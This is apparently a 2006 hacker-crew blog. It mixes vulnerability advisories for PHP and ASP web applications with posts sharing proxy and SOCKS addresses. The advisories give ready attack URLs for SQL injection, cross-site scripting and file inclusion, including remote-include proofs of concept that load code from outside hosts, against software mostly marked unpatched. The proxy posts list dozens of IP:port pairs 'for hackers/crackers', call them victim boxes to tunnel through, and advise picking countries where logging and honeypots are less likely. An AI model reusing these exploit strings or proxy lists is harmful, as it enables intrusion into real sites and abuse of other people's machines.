by r0t,der4444,cembo,VietMafia

Monday, May 29, 2006

DGNews v 1.5 File Upload Vuln.

###############################################
Vuln. discovered by : r0t
Date: 29 may 2006
vendor:www.diangemilang.com/dgscripts.php
affected versions:v 1.5 and prior
###############################################


Vuln. Description:

Due to improper checks of file extensions in admin/upprocess.php it is possible to upload arbitrary files to the "img" directory. This can e.g. be exploited to upload and execute malicious PHP scripts.


note: Successful exploitation requires access to the administration section.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Saturday, May 27, 2006

proxy&socks 4 hackers/crackers

UNITED STATES, BANGOR, MAINE
HTTPss: 142.167.20.183:8176
Sockss: 142.167.20.183:5268

HTTPss: 89.102.105.246:48045
Sockss: 89.102.105.246:38399

HTTPs: 206.192.43.188:59226
Socks: 206.192.43.188:61050
UNITED STATES, COUDERSPORT, PENNSYLVANIA

HTTPs: 82.46.152.144:40509
Socks: 82.46.152.144:20800
UNITED KINGDOM, BIRMINGHAM, ENGLAND

HTTPs: 69.145.114.241:48424
Socks: 69.145.114.241:33464
UNITED STATES, GRAND JUNCTION, COLORADO

HTTPs: 84.237.193.203:52083
Socks: 84.237.193.203:52985
LATVIA, -, -

HTTPs: 83.24.127.135:59158
Socks: 83.24.127.135:26084
POLAND, WARSAW, MAZOWIECKIE

HTTPs: 82.176.14.140:26544
Socks: 82.176.14.140:42765
NETHERLANDS, VLISSINGEN, ZEELAND

HTTPs: 82.42.159.153:51430
Socks: 82.42.159.153:50484
UNITED KINGDOM, EDINBURGH, SCOTLAND

HTTPs: 88.118.194.26:37838
Socks: 88.118.194.26:58952
LITHUANIA, -, -

HTTPs: 83.5.41.58:10250
Socks: 83.5.41.58:53175
POLAND, -, -

HTTPs: 62.83.4.29:26856
Socks: 62.83.4.29:60138
SPAIN, BARCELONA, CATALU├▒A

HTTPs: 85.168.58.180:18160
Socks: 85.168.58.180:59005
FRANCE, PARIS, ILE-DE-FRANCE

HTTPs: 200.102.182.138:20185
Socks: 200.102.182.138:10553
BRAZIL, PORTO ALEGRE, RIO GRANDE DO SUL

HTTPs: 63.98.143.110:15336
Socks: 63.98.143.110:5228
UNITED STATES, ST. SIMONS ISLAND, GEORGIA

HTTPs: 62.241.65.63:49491
Socks: 62.241.65.63:63991
SPAIN, GIJON, ASTURIAS

HTTPs: 82.216.127.121:64932
Socks: 82.216.127.121:40544
FRANCE, -, -

HTTPs: 85.237.175.54:56049
Socks: 85.237.175.54:43902
POLAND, -, -

HTTPs: 218.18.33.2:50839
Socks: 218.18.33.2:63245
CHINA, SHENZHEN, GUANGDONG

HTTPs: 84.90.3.174:7816
Socks: 84.90.3.174:25656
PORTUGAL, -, -

HTTPs: 213.89.95.208:55133
Socks: 213.89.95.208:47460
SWEDEN, STOCKHOLM, STOCKHOLM

HTTPs: 65.94.149.151:12518
Socks: 65.94.149.151:37552
CANADA, MONTREAL, QUEBEC

HTTPs: 12.226.114.115:20798
Socks: 12.226.114.115:49122
UNITED STATES, MILLSBORO, DELAWARE

HTTPs: 88.247.80.192:53302
Socks: 88.247.80.192:8622
TURKEY, -, -

HTTPs: 65.35.87.176:46582
Socks: 65.35.87.176:47038
UNITED STATES, MELBOURNE, FLORIDA

EVA-Web <=2.1.2 vuln.

###############################################
Vuln. discovered by : r0t
Date: 27 may 2006
vendor:http://spip-edu.edres74.net/
affected versions:2.1.2 and prior
###############################################

Vuln. Description:

EVA-Web contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "debut_image" parameter in "article-album.php3" and "date" parameter in "rubrique.php3" and "perso","aide" parameters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/article-album.php3?id_article=39&debut_image=[XSS]
/rubrique.php3?id_rubrique=29&date=[XSS]
/?perso=[XSS]
/?aide=[XSS]


+
/?perso=full path
/?aide=full path


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Friday, May 26, 2006

Daily real elite socks&proxys

For today i will give some Brazil proxies.
As you know even you will think that your victim box wich you use for tunnelig our just as proxy server is located on USA dont make logs, you can never be sure for honey's or for other presents*, so better use some 3-th world country┬┤s.


HTTPs: 201.9.160.39:41186
Socks 4/5: 201.9.160.39:8617

HTTPs: 201.27.196.56:9425
Socks 4/5: 201.27.196.56:40558

HTTPs: 201.32.23.71:62284
Socks 4/5: 201.32.23.71:13168

HTTPs: 201.78.48.126:42630
Socks 4/5: 201.78.48.126:58177

HTTPs: 200.227.168.50:31348
Socks 4/5: 200.227.168.50:36536

HTTPs: 201.79.0.121:59936
Socks 4/5: 201.79.0.121:25353

HTTPs: 200.228.72.181:12626
Socks 4/5: 200.228.72.181:10792

HTTPs: 200.242.94.30:64551
Socks 4/5: 200.242.94.30:60012

HTTPs: 201.26.104.7:60972
Socks 4/5: 201.26.104.7:27720

HTTPs: 201.51.13.42:15098
Socks 4/5: 201.51.13.42:23530

HTTPs: 200.139.141.198:13834
Socks 4/5: 200.139.141.198:17246

Wednesday, May 24, 2006

eSyndicat Directory Software - Local File Inclusion

============================
discovered by : VietMafia
developer's site: www.esyndicat.com
script: eSyndicat Directory Software 1.2
risk: moderate
status: unpatched
============================

This script has a vuln which can be exploited by malicious people to disclose sensitive information and potentially compromise a vulnerable system.

Input passed to the "path_to_config" parameter in admin/cron.php isn't properly verified, before it is used to include files. This can be exploited to include arbitrary files from local resources.

example:

http://host/path/admin/cron.php?path_to_config=file%00

Successful exploitation requires that "register_globals" is enabled and that "magic_quotes_gpc" is disabled.

Saturday, May 20, 2006

PMB 0.1

Details Here

.LV Elite Socks/Proxies 4 today

LATVIA

HTTPs: 81.198.50.94:60713
Socks: 81.198.50.94:34724

HTTPs: 81.198.195.102:57530
Socks: 81.198.195.102:24246

HTTPs: 62.63.184.127:48768
Socks: 62.63.184.127:25824

HTTPs: 84.237.184.218:60639
Socks: 84.237.184.218:23285

HTTPs: 84.245.198.194:26890
Socks: 84.245.198.194:36039


Get more by requesting them on board.

Friday, May 19, 2006

Satanic Socks Server v0.66.170506

Get it

Sunday, May 14, 2006

PopPhoto - Remote File Inclusion Vuln

PopPhoto - Remote File Inclusion Vuln

=================================
script: PopPhoto 3.5.4 and below
risk: critical
status: unpatched
discovered by: VietMafia
=================================

Vuln. Description:

This flaw is due to an input validation error in the "resources/includes/popp.config.loader.inc.php"(line 25) that does not validate the "cfg['popphoto_base_path']" variable properly. Remote attackers can include
malicious scripts and execute arbitrary commands with the privileges of the web server

PoC:

http://[target]/[path]/resources/includes/popp.config.loader.inc.php?
include_path=http://unsecured-systems.com/forum/

sorry all, i 'm still on travelling so i dont have much time to contribute :) i will be back very soon.

Saturday, May 13, 2006

FlexChat XSS

###############################################
Vuln. discovered by : r0t (Pridels Sec Crew)
Date: 13 may 2006
vendorlink:http://www.flexchat.net/
affected versions:v.2.0 and prior
###############################################


Vuln. Description:

FlexChat contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "username","CFTOKEN"
parameter in "index.cfm" and input passed to "CFTOKEN","CFID" parameter in "chat.cfm" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Monday, May 08, 2006

still relaxing.

I told that i will not post, but as you see it was dificult to dont spend 3 minutes for another vuln. report/advisory.
In that "holiday" time i was checked few times mail/blog and was geting smile on my face for some persons.

One of nice persons will be a "wanabe hacker" ReZEN from XOR Crew.
After i was published Albinator vuln in blog (advisory was long time posted by VietMafia on our board), ReZEN explode with his geniallity. Start with adding lame comments and ending with "nice greetings" in his next advisories.
As he supposed that his advisories are more usable as mine or ours...
OK. Let me edit that ...
In first point you must see that diference between us are to big, cauz i dont think that im great hacker or any type of hacker, and i post vuln, cauz that must be done from my view and just for global insecure report.
But look at you , you are hard working wanabe hax0r, for you each advisory is a one step more to your fame as a great hax0r.
And even that "nice greetings" are absolutly lame , i know that is good tryin to get more fame , does you advisories dont give you enough fame on defacers scene?
Forget that i will post in my vuln. reports your nickname or your crew name just to work for your fame.
And about Albinator , it was audited by VietMafia , so credits goes to him.. mine was just XSS add.
So about Pridels Sec Crew i dont think that somebody from those guys did something to you or your crew , but if you dont think like me , than only person who can be attacked form lames like you its me, so you already forgot about another guys, your target is me.
All your "nice greetings" adress directly to me , i always will be glad to see your nice work:)

To all others, im still chillin in lovely Latvia and enjoying ice hockey , but i'll be back soon, cauz looks that my favorite team will not get what they really deserve.

Creative Community Portal vuln.

###############################################
Vuln. discovered by : r0t (Pridels Sec Crew)
Date: 8 may 2006
vendor:www.creative-software.co.uk/community2.html
affected versions:1.1 and prior
###############################################


Vuln. Description:


Creative Community Portal contains a multiple flaws that allows a remote sql injection attacks.Input passed to the "forum_id" parameter in "DiscView.php" and "Discussions.php" ,input passed to the "article_id" parameter in "ArticleView.php" and input passed to the "event_id" parameter in "EventView.php" and input passed to the "answer_id","AddVote" parameter in "PollResults.php" and input passed to the "mid" parameter in "DiscReply.php" isn't properly sanitised before being used in a SQL query.
Input passed to the "prod_id" parameter in "cart.php" and "product_info.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


examples:

/ArticleView.php?article_id=[SQL]
/DiscView.php?mid=144&forum_id=[SQL]
/Discussions.php?forum_id=[SQL]
/EventView.php?event_id=[SQL]
/PollResults.php?answer_id=32&AddVote=[SQL]
/PollResults.php?answer_id=[SQL]
/DiscReply.php?forum_id=1&mid=[SQL]


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Thursday, May 04, 2006

Defaced e-zine

Defaced issue 0x09

0x00 >< content
0x01 >< introduction
0x02 >< news
0x03 >< mailmanz bag
0x04 >< sparc virii
0x05 >< static libc calls hook
0x06 >< monster in my pocket
0x07 >< choose life
0x08 >< death industry
0x09 >< pdp 11 part 1
0x0a >< pdp 11 part 2
0x0b >< tits hacking tricks
0x0c >< outro


Download

1 - 8 :

Defaced issue 0x01
Defaced issue 0x02
Defaced issue 0x03
Defaced issue 0x04
Defaced issue 0x05
Defaced issue 0x06
Defaced issue 0x07
Defaced issue 0x08

Wednesday, May 03, 2006

albinator <= 2.0.8 Remote File Inclusion & XSS vuln

###############################################
Vuln. discovered by :VietMafia & r0t (Pridels Sec Crew)
Date: 3 may 2006
vendor:http://www.albinator.com/
affected versions:2.0.8 and prior
###############################################



Vuln. Description:


1. Remote File Inclusion Vuln.

Input passed to the "Config_rootdir" parameter in "eday.php","eshow.php","forgot.php" isn't properly verified, before it is used to include files. This can be exploited to include arbitrary files from external and local resources.


example code :

$dirpath = "$Config_rootdir";
require_once($dirpath."essential/dbc_essential.php");
require_once($dirpath."essential/globalfunctions.php");


this can lead to remote file include.


example PoC:

http://victim/eshow.php?Config_rootdir=http://evilcode.php




2. cross-site scripting attack vuln.

Input passed to the "cid" parameter in dlisting.php and to the "preloadSlideShow" parameter in showpic.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


examples:


/dlisting.php?cid=1[XSS]

/showpic.php?aid=21&uuid=175&pid=172&slide_show=
1&slide_show_secs=0&preloadSlideShow=[XSS]


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

phpBB auction mod - Remote File Inclusion Vuln

===================================
developer's site: http://www.phpbb-auction.com
script: Auction mod for phpBB
risk: critical
status: unpatched
discovered by: VietMafia
===================================

Vuln. Description:

This flaw is due to an input validation error in the "aution\auction_common.php"(line 26)
that does not validate the "$phpbb_root_path" variable properly. Remote attackers can include
malicious scripts and execute arbitrary commands with the privileges of the web server

PoC:

http://[target]/[path]/aution\auction_common.php?
phpbb_root_path=http://unsecured-systems.com/forum/

===================================
have a good time all my friends
===================================

Monday, May 01, 2006

ice hockey 2006 @Riga


In 5.05 will start world championship of ice-hockey in Riga/Latvia , so to relax with watching hockey and to meet my friends from there and of course tasty beer+blond chicks...:)
i will take for me holidays and will go there...I think that its possible that cembo also goes there..
So, thats means that you can relax from my vuln. reports for 2 weeks.
But i think that VietMafia or der4444 will give some vuln. report..:)

CyberBuild vuln.

###############################################
Vuln. discovered by : r0t
Date: 1 may 2006
vendorlink:www.smartwin.com.au/cyberbuild.htm
affected versions:last
###############################################

Vuln. Description:

1. SQL injection.

CyberOffice Warehouse Builder contains a flaw that allows a remote sql injection attacks.Input passed to the "SessionID" parameter in "login.asp" and input passed to the "ProductIndex" parameter in "browse0.htm" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:

/login.asp?SessionID=[SQL]
/browse0.htm?ProductIndex=[SQL]



2. XSS
contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "SessionID" parameter in "login.asp" and input passed to the "ProductIndex" parameter in "browse0.htm" and input passed to the "rowcolor","heading" parameter in "/include/result.asp" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/login.asp?SessionID=[XSS]

/browse0.htm?ProductIndex=[XSS]

/include/result.asp?debug=print&cols=3&lineco
lor=%23AAAAAA&menu=category&body=bodyblue&bol
d=bodyheading&hlcolor=%2388C4FF&bgcolor=%23E
0FFE0&menucolor=%23E0FFE0&hdcolor=%23B0B0B0&
idcolor=%23FFFFFF&header=bodywhite&rowcolor=[XSS]

/include/result.asp?debug=print&cols=3&linec
olor=%23AAAAAA&menu=category&body=bodyblue&b
old=bodyheading&hlcolor=%2388C4FF&bgcolor=%2
3E0FFE0&menucolor=%23E0FFE0&hdcolor=%23B0B0
B0&idcolor=%23FFFFFF&header=bodywhite&rowco
lor=%23E0FFE0&row=bodyblack&label=bodyblue&
heading=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

SunShop XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 1 may 2006
vendor:
www.turnkeywebtools.com/index.php/location/products/product/sunshop//
affected versions:3.5 and prior
###############################################

Vuln. Description:

SunShop Shopping Cart contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "prevaction","previd","prevstart",
"itemid","id","action" parameter in "index.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/index.php?action=item&id=15&
prevaction=[XSS]

/index.php?action=item&id=15&
prevaction=category&previd=[XSS]

/index.php?action=item&id=15&
prevaction=category&previd=2&
prevstart=[XSS]

/index.php?action=sendtofriend&
type=item&itemid=[XSS]

/index.php?action=item&id=[XSS]

/index.php?action=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Avactis Shopping Cart vuln.

###############################################
Vuln. discovered by : r0t
Date: 1 may 2006
vendor:http://www.avactis.com
affected versions:0.1.2 (latest) and prior
###############################################

Vuln. Description:

1. sql inj.

Avactis Shopping Cart contains a flaw that allows a remote sql injection attacks.Input passed to the "category_id" parameter in "store_special_offers.php" and "store.php" isn't properly sanitised before being used in a SQL query.
Input passed to the "prod_id" parameter in "cart.php" and "product_info.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


examples:

/store_special_offers.php?asc_action=
SetCurrCat&category_id=1[SQL]

/cart.php?asc_action=AddToCart&prod_i
d=1[SQL]

/store.php?asc_action=SetCurrCat&cate
gory_id=[SQL]

/product_info.php?asc_action=SetCurren
tProduct&prod_id=[SQL]



2. xss

Avactis Shopping Cart contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "category_id" parameter in "store.php","store_special_offers.php" and input passed to "prod_id" parameter in "product_info.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/store_special_offers.php?asc_action=
SetCurrCat&category_id=1[XSS]

/product_info.php?asc_action=SetCurren
tProduct&prod_id=[XSS]

/store.php?asc_action=SetCurrCat&categ
ory_id=[XSS]


3. Full path disclure

Attacker doing sql injection tests will get full install path.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

 
Copyright (c) 2006 Pridels Sec Crew